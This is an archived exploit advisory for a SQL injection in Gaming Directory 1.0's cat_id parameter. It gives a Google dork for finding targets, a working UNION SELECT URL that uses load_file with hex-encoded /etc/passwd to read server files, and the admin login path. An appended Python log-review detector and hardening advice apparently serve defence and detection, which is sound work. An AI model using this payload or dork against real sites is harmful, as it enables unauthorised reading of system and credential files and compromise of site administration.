ID 1337DAY-ID-2821 Type zdt Reporter t0pP8uZz Modified 2008-04-05T00:00:00
Description
Exploit for unknown platform in category web applications
================================================================
Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability
================================================================
--==+================================================================================+==--
--==+ Gaming Directory 1.0 SQL Injection Vulnerabilities +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz
Discovered On: 5 April 2008
Google Dork: inurl:"directory.php?ax=list" gaming
DESCRIPTION:
This popular gaming directory script is vulnerable due to insecure MySQL queries.
This allows a remote attacker to pull information from the database.
The injection below uses MySQL's load_file function. Since the admin area password is stored
in a config file, we can use load_file to try to locate it and display the contents of the file.
Certain permissions for the running DB user are required for this to work. The load_file call below
contains a string that has been converted to hex; if you can read hex, it is /etc/passwd, so this
should load the /etc/passwd file on most Linux distros. Remember that certain permissions are needed.
EXPLOITS:
http://site.com/directory.php?ax=list&sub=6&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(0x2F6574632F706173737764),4/**/FROM/**/links/*
NOTE/TIP:
admin login is at /siteadmin/
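
Added example (not part of the original advisory and not the script's own code): a log-review check that flags the request shown under EXPLOITS by stripping the /**/ comments that stand in for spaces, then decoding the hex literal passed to load_file so the targeted file is visible. It assumes cat_id and sub are meant to be integer IDs; the sample request lines and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample request lines; the second is the request from the advisory.
SAMPLE_REQUESTS = [
    "/directory.php?ax=list&sub=6&cat_id=12",
    "/directory.php?ax=list&sub=6&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/"
    "1,2,load_file(0x2F6574632F706173737764),4/**/FROM/**/links/*",
    "/directory.php?ax=list&sub=6&cat_id=3&q=credit+union",
]

COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)   # closed or unterminated /* */
UNION = re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)
LOAD_FILE = re.compile(r"load_file\s*\(\s*(0x[0-9a-f]+|'[^']*')", re.I)

def normalize(value):
    """Replace inline SQL comments with a space and collapse whitespace."""
    return re.sub(r"\s+", " ", COMMENT.sub(" ", value)).strip()

def decode_arg(arg):
    """Turn a MySQL hex literal or quoted string into readable text."""
    if arg.lower().startswith("0x"):
        digits = arg[2:]
        if len(digits) % 2:
            digits = "0" + digits
        return bytes.fromhex(digits).decode("latin-1")
    return arg.strip("'")

def inspect(request, numeric_params=("cat_id", "sub")):
    """Return (parameter, finding) pairs for one request line."""
    findings = []
    query = urlsplit(request).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = normalize(raw)
        # Assumption: these parameters only ever carry integer IDs.
        if name in numeric_params and not re.fullmatch(r"\d+", raw):
            findings.append((name, "non-numeric value"))
        if UNION.search(value):
            findings.append((name, "UNION SELECT"))
        for match in LOAD_FILE.finditer(value):
            findings.append((name, "load_file -> " + decode_arg(match.group(1))))
    return findings

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(inspect(line) or "clean", "<-", line[:60])
```

On the database side, LOAD_FILE() only works for an account that holds the FILE privilege, so revoking it from the web application's account removes this file-read path; casting or binding cat_id as an integer removes the injection itself.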
# 0day.today [2018-02-18] #